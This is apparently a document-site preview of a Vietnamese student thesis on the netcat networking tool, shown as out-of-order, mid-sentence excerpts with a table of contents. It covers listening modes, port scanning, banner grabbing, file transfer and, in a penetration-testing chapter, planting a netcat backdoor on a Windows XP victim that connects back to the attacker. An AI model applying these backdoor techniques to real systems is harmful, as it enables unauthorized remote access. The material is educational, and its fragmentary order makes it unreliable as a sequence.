nhập, Netcat cho phép liệt kê thông qua cổng quét banner grabbing Netcat sử dụng cho cổng chuyển hướng giao thông, che dấu nguồn gốc công 34 GVHD: ThS Đào Ngọc Tú SVTH: Nguyễn Thị Khuyên Lớp CNTT Khóa K13 NETCAT POWER TOOL DANH MỤC THAM KHẢO DANH MỤC TÀI LIỆU THAM KHẢO TIẾNG ANH Netcat and Cryptcat - McGraw-Hill Netcat Starter Guide by Kenneth Curtis Yerrid Netcat Power Tools 1st Edition DANH MỤC CÁC WEBSITE THAM KHẢO http://google.com/ http://store.elsevier.com/Netcat-Power-Tools/isbn-9780080558738/ https://cld.pt/dl/ /Instant%20Netcat%20Starter_.pdf http://www.goodreads.com/book/show/17399598-netcat-starter-guide GVHD: ThS Đào Ngọc Tú SVTH: Nguyễn Thị Khuyên Lớp CNTT Khóa K13 35 [...]... thống và cung cấp một backdoor vào hệ thống cho người khác sử dụng 2.9 Khởi tạo một kết nối từ Backdoor Phương pháp thứ hai và phổ biến hơn để truy cập vào một backdoor, là phải có các nạn nhân đầu một kết nối đến hệ thống tấn công Trong ví dụ này, hệ thống tấn công của chúng tôi là sử dụng Netcat ở chế độ lắng nghe Các nạn nhân sẽ tạo ra một kết nối đến hệ thống tấn công trên cổng xác định và gửi một. .. Thị Khuyên Lớp CNTT Khóa K13 25 NETCAT POWER TOOL CHƯƠNG 2: NETCAT VÀ CÁC TÍNH NĂNG THỬ NGHIỆM CỦA NETCAT Bây giờ thời gian tới một người dùng đăng nhập vào hệ thống, lệnh backdoor Netcat được kích hoạt và gửi một dấu nhắc lệnh để tấn công hệ thống Như thể hiện trong hình 2.15, một quản trị viên miền đăng nhập vào hệ thống nạn nhân và kích hoạt các backdoor, mà đã cho một dấu nhắc lệnh của Windows Figure... bản của Netcat mà kết hợp các pineline được mã hóa Cryptcat sử dụng cú pháp dòng lệnh giống như Netcat, nhưng sử dụng mã hóa twofish Cũng nên xem xét sử dụng Netcat bên trong một Shell (SSH) pineline an toàn như một phương tiện của việc chuyển mã hóa Netcat 1.8 Banner Grabbing Banner grabbing là một phương pháp đơn giản nhưng hiệu quả cao trong việc thu thập thông tin về một mục tiêu từ xa, và có thể... 1.11Tóm lược Netcat là một chương trình mạng được thiết kế để đọc và ghi dữ liệu trên cả hai kết nối UDP, sử dụng bộ giao thức IP TCP Đơn giản hơn, Netcat là phiên bản mạng của chương trình UNIXcat Trong cùng một cách mà cat đọc và ghi thông tin cho file, netcat đọc và ghi thông tin qua kết nối mạng 1.12 Giải pháp Fast Track 1.12.1 Sự giới thiệu Netcat là một chương trình đơn giản cho phép đọc và ghi dữ... TÍNH NĂNG THỬ NGHIỆM CỦA NETCAT CHƯƠNG 2 NETCAT VÀ CÁC TÍNH NĂNG THỬ NGHIỆM 2.1 Netcat Netcat là một Transmission Control Protocol (TCP / giao thức Internet (IP) tiện ích mạnh mẽ, có thể xử lý vô số các chức năng hệ thống- và liên quan đến mạng Chương này sẽ tập trung vào một số cách phổ biến để sử dụng Netcat trong quá trình thử nghiệm xâm nhập mạng Mặc dù Netcat không phải là một công cụ khai thác trong... Server Netcat là một công cụ đa năng có thể thực hiện vô số các chức năng giao thức TCP / IP Một tính năng rất hữu ích, đặc biệt đối với một kiểm tra xâm nhập, là khả năng ra một tiện ích từ một hệ thống khác Trong phần này, chúng ta sẽ sử dụng tính năng này để truy cập vào một backdoor từ xa trên một hệ thống Windows XP Một backdoor là một kênh truyền thông rằng sẽ cung cấp shell lệnh từ xa của một hệ thống. .. CNTT Khóa K13 5 NETCAT POWER TOOL CHƯƠNG 1: GIỞI THIỆU VỀ NETCAT VÀ CÁC HOẠT ĐỘNG CƠ BẢN CỦA NETCAT Nếu không có-n option, Netcat hiện một tra cứu ngược lại và cho chúng ta biết rằng địa chỉ IP được chỉ định thuộc về Google Để làm một hex dump của giao dịch Netcat vào một tập tin, sử dụng lựa chọn –o filename Để xác định trên cổng vào (máy chủ) máy tính địa phương cho Netcat lắng nghe, sử dụng- p port:... tập tin từ máy chủ Một công cụ hữu ích redirector là pine (|), cho phép đầu ra từ một lệnh để phục vụ như là đầu vào cho một lệnh thứ hai Các quá trình này cùng nhau tạo thành một " pipeline" Một số lệnh phổ biến thường được sử dụng với Netcat là cat (gửi một tập tin), echo, và tar (nén và gửi một thư mục) 1.5 Giao diện trò chuyện đơn giản Netcat là một chương trình mạng được thiết kế để đọc và ghi dữ.. .NETCAT POWER TOOL CHƯƠNG 1: GIỞI THIỆU VỀ NETCAT VÀ CÁC HOẠT ĐỘNG CƠ BẢN CỦA NETCAT connect to somewhere chỉ ra cú pháp của chế độ client Netcat Thông thường, sử dụng Netcat như một khách hàng trên máy tính để có được một số loại thông tin từ máy khác Listen for inboundchỉ ra cú pháp của chế độ máy chủ Netcat Chú ý-l Switch, đặt Netcat vào chế độ lắng nghe Lệnhnc –l sẽ đặt Netcat vào máy chủ... nhân), cho phép chúng ta truy cập vào hệ thống tại một thời gian sau đó Trong phần này, tôi sẽ chứng minh cách khác nhau để sử dụng và tạo ra một backdoor trên một máy chủ nạn nhân của Windows XP Để minh chứng, trong phần này, tôi sẽ tiếp tục sử dụng netcat và nc.exe GVHD: ThS Đào Ngọc Tú SVTH: Nguyễn Thị Khuyên Lớp CNTT Khóa K13 22 NETCAT POWER TOOL CHƯƠNG 2: NETCAT VÀ CÁC TÍNH NĂNG THỬ NGHIỆM CỦA NETCAT

Ngày đăng: 06/06/2016, 21:10

Từ khóa liên quan

Mục lục

  • MỤC LỤC

  • LỜI CẢM ƠN

  • KÍ HIỆU CÁC CỤM TỪ VIẾT TẮT

  • DANH MỤC CÁC HÌNH VẼ

  • MỞ ĐẦU

    • 1 Lý do chọn đề tài

    • 2 Mục đích nghiên cứu

    • 3 Đối tượng phạm vi nghiên cứu

    • 4 Phương pháp nghiên cứu

    • 5 Ý nghĩa khoa học và thực tiễn của đề tài

    • CHƯƠNG 1 : GIỚI THIỆU VỀ NETCAT VÀ CÁC HOẠT ĐỘNG CƠ BẢN CỦA NETCAT

      • 1.2 Xác nhận cài đặt Netcat

      • Figure 1.1 Netcat Installed in Windows

        • 1.3 Phương thức hoạt động

        • Figure 1.2 Starting Netcat in Client Mode (Windows to Windows)

        • Figure 1.3 Starting Netcat in Client Mode (Windows to Windows)

        • Figure 1.4 Starting Netcat in Client Mode (Windows to Linux)

        • Figure 1.5 Netcat with the –n Option

        • Figure 1.6 Netcat without the –n Option

          • 1.4 Công cụ redirector

          • 1.5 Giao diện trò chuyện đơn giản

          • Figure 1.7 Sending Data Across a Connection

            • 1.6 Port Scanning

            • Figure 1.8 Port Scanning with Netcat

              • 1.7 Chuyển tập tin (Transferring Files)

              • 1.8 Banner Grabbing

Tài liệu cùng người dùng

Tài liệu liên quan